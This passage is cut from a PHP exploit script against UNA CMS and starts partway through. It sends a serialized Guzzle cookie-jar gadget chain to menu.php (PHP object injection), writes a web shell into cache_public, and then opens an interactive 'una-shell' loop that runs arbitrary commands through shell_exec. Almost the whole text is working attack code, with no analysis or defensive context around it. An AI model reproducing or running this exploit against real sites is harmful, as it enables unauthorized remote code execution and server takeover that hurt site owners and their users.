\n"; print "\nExample....: php $argv[0] http://localhost/una/"; print "\nExample....: php $argv[0] https://unacms.com/\n\n"; die(); } define('ON_APACHE', true); define('SH_PATH', ON_APACHE ? './cache_public/sh.phtml' : './cache_public/sh.php'); class GuzzleHttp_Cookie_SetCookie { private $data = ['Expires' => '', 'Value' => '']; } class GuzzleHttp_Cookie_FileCookieJar { private $cookies, $filename = SH_PATH, $storeSessionCookies = true; function __construct() { $this->cookies = [new GuzzleHttp_Cookie_SetCookie]; } } $url = $argv[1]; $ch = curl_init(); $chain = serialize(new GuzzleHttp_Cookie_FileCookieJar); $chain = str_replace('GuzzleHttp_Cookie_SetCookie', 'GuzzleHttp\Cookie\SetCookie', $chain); $chain = str_replace('GuzzleHttp_Cookie_FileCookieJar', 'GuzzleHttp\Cookie\FileCookieJar', $chain); curl_setopt($ch, CURLOPT_URL, "{$url}menu.php"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_HTTPHEADER, ["X-Requested-With: XMLHttpRequest"]); curl_setopt($ch, CURLOPT_POSTFIELDS, "o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=" . urlencode($chain)); print "\n[+] Performing PHP Object Injection"; curl_exec($ch); curl_close($ch); print "\n[+] Launching shell\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url . SH_PATH); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); $phpcode = "print '____'; print shell_exec(base64_decode('%s')); print '____';"; while(1) { print "\nuna-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]); preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n"); }